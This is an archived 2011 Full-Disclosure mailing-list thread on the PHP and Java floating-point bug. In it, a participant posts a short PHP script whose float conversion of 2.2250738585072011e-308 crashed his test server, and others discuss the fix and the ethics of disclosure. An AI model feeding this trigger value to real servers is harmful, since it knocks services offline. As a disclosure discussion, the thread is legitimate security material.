| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1297356028.17519.6.camel@kafir>
Date: Thu, 10 Feb 2011 11:40:28 -0500
From: Leon Kaiser <literalka@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [Fwd: Re: {Java,PHP} Server Exploits]
From: Leon Kaiser <literalka@...il.com>
Reply-to: literalka@...a.eu
To: Cal Leeming [Simplicity Media Ltd]
<cal.leeming@...plicitymedialtd.co.uk>
Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Wed, 09 Feb 2011 19:15:36 -0500
Years, if I'm not mistaken.
========================================================
Leon Kaiser - Head of GNAA Public Relations -
literalka@...a.eu || literalka@...tse.fr
http://gnaa.eu || http://security.goatse.fr
7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
-- Andrew "weev" Auernheimer
========================================================
> On Wed, 2011-02-09 at 20:00 +0000, Cal Leeming [Simplicity Media Ltd]
> wrote:
>
> > Christian, this issue has been 'floating' around for several months
> > now.
> >
> > On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras
> > <uuf6429@...il.com> wrote:
> >
> > Ah, been reading more about it, seems it was fixed.
> >
> > Still, there should have been safeguards around this - I'm
> > thinking they should check existing conversion routines to
> > ensure they're safe...
> >
> >
> >
> >
> >
> > On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras
> > <uuf6429@...il.com> wrote:
> >
> > Was it fixed? What's the current status?
> >
> > The sounds like a major issue, and the lack of info
> > about it is darn impressive.
> >
> >
> > I tried it on my test Windows WAMP server:
> >
> > <?php
> >
> > ob_implicit_flush(true);
> >
> > echo 'Start test...<br/>';
> >
> > $f=(float)"2.2250738585072011e-308";
> > echo 'Try 1 => '.$f.'</br>';
> >
> > $f=floatval("2.2250738585072011e-308");
> > echo 'Try 2 => '.$f.'</br>';
> >
> > $f="2.2250738585072011e-308";
> > echo 'Try 3 => '.(float)$f.'</br>';
> >
> > echo 'Test failed, server not vulnerable!</br>';
> >
> > ?>
> >
> > All three tests succeeded in crashing the server.
> >
> > With all due respect, this should NOT have been
> > disclosed without being FIXED (as it seems to me).
> > Plus, I'm a bit amazed such a bug exists in PHP -
> > since converting to floating point is a trivial
> > operation, it should have been limited and
> > safe-guarded from the start.
> > There are a lot of servers out there happily
> > accepting input as floating point values, this bug
> > should be top priority...
> >
> >
> > Chris.
> >
> >
> >
> > On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser
> > <literalka@...il.com> wrote:
> >
> >
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists